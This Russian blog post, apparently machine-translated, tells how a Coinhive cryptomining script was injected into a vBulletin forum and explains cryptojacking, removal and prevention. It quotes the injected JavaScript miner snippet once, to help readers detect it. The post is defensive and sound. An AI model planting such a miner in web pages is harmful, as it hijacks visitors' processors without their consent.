Как удалить скрипт Crypto-mining Coinhive с вашего веб-сайта

Я обычно посещаю форум каждый день, и я не видел его накануне. Поэтому я предполагаю, что это произошло некоторое время ночью, мое время, когда я спал.

Я использую программное обеспечение vBulletin для форума, и оно было обновлено до последней версии. Более того, для нас это было довольно неожиданно, так как домен TheWindowsClub.com использует Sucuri Web Antivirus & Firewall для защиты от сетевых веб-угроз и атак.

Программное обеспечение для защиты ПК успешно остановило запуск вредоносного скрипта на моем компьютере с Windows 10. Я проверил с другими браузерами, такими как Chrome & Edge, и результаты были такими же.

После щелчка правой кнопкой мыши на веб-странице форума и проверки исходного кода я обнаружил, что это вредоносный скрипт CryptoMiner для CoinHive.

Это вредоносный код Coinhive Javascript, который попал в мой код форума:

var miner = new CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();

В любом случае, первое, что я сделал, это взять форум вниз и проинформировать Сукури.

Люди Сукури очистили форум сценария Coinhive, который застрял на моем форуме через несколько часов, и все были в порядке.

Что такое CoinHive

Coinhive предлагает Java-шахтер для криптовалюта Monero, который вы можете встроить на свой веб-сайт, и использовать CPU посетителей веб-сайтов для того, чтобы монеты для вас.

Это называется Cryptojacking . Это связано с захватом браузеров пользователей для разработки криптовалютных систем. Некоторые владельцы веб-сайтов могут сами использовать их, чтобы заработать деньги, но в нашем случае он был введен.

Когда пользователь обращается к зараженному сайту, JavaScript Coinhive выполняет и запускает Monero с использованием ресурсов процессора пользователя. Это может привести к дросселю процессора и непредвиденному сбою системы в машине жертвы.

Теперь, если ваш браузер заражен, вы увидите, что ваше использование ресурсов растет. Закройте браузер, и он упадет. Пользователь может заметить, что его машина нагревается, вентилятор работает быстро или батарея разряжается быстро.

Я попросил моего коллегу Саураба Мухекара посетить мой форум, используя его Mac и посмотреть, что произошло. Ну, его компьютер Mac был затронут также, когда он открыл форум с помощью Safari! Он является одним из тех умных пользователей Mac OSX, который использует антивирусное программное обеспечение для своего Mac. Его антивирус Avast для Mac успешно остановил запуск вредоносного скрипта.

Said Saurabh,

Вредоносная программа CoinHive не только захватывает компьютер с ОС Windows, но также и Mac, так как это заражение Javascript на основе браузера. Хорошо, что я не верю в миф о том, что Mac не нуждается в антивирусном программном обеспечении, иначе моя машина была бы заражена, а мой Mac продолжал бы выпускать монеты для кого-то другого.

Предотвратить заражение вашего сайта веб-сайтом CoinHive

1. Не используйте никаких шаблонов или плагинов NULL на своем веб-сайте / форуме.
2. Обновите свою CMS до последней версии.
3. Регулярно обновляйте свое хостинг-программное обеспечение (PHP, Database и т. Д.).
4. Защитите свой сайт от поставщиков веб-безопасности, таких как Sucuri, Cloudflare, Wordfence и т. Д.
5. Примите основные меры предосторожности, чтобы защитить свой блог.

Удаление шахтёра CoinHive с веб-сайта

Прежде всего, вам нужно быть веб-мастером зараженный веб-сайт - или иметь учетные данные администратора, которые предоставляют вам доступ ко всем файлам веб-сайта.

Теперь, когда ваш антивирус обнаруживает заражение CoinHive, щелкните правой кнопкой мыши на веб-странице и выберите Просмотреть исходный код. Затем нажмите Ctrl + F и найдите «CoinHive».

После того, как вы определили местоположение вредоносного кода, вам нужно увидеть его положение - где оно расположено. Теперь вам нужно удалить его вручную. Для этого вам нужно немного знать о своей платформе. Вам придется найти зараженный файл / s и вручную удалить из него сценарий. Если вы не уверены в этом, попросите какого-нибудь эксперта сделать это. Поскольку мы используем Sucuri, мы позволяем им это делать.

Сделав это, очистите кеш сервера и браузера. Если вы используете какой-либо кеш-плагин или скажете MaxCDN, очистите также эти кеши.

Защитите себя от скриптов криптовашин

Технология Cryptocurrencies & Blockchain захватывает мир. Это создает влияние на глобальную экономику и вызывает технологические сбои. Все начали фокусироваться на таком прибыльном рынке, и это также включает хакеров. По мере увеличения доходности, мы должны ожидать, что такие технологии будут использованы неправильно. Это темная сторона любой новой технологии.

Мы можем делать все возможное, чтобы принять все возможные меры предосторожности. Помимо использования хорошего программного обеспечения для обеспечения безопасности, используйте расширение Chrome или Firefox, которое блокирует использование сайтов вашим процессором для защиты Cryptocurrency - или, еще лучше, используйте Anti-WebMiner, который остановит атаки Cryptojacking Mining Script, изменив ваш файл Hosts. Он работает во всех браузерах. Если вы являетесь пользователем Mac, пожалуйста, получите также антивирусное программное обеспечение для вашего компьютера.

В связи с многочисленными предосторожностями, если вы когда-нибудь почувствуете, что можете посетить зараженный сайт, было бы неплохо очистить ваш браузер кэш и сканировать ваш компьютер с помощью антивирусного программного обеспечения, а также AdwCleaner.

Будьте в безопасности, оставайтесь начеку!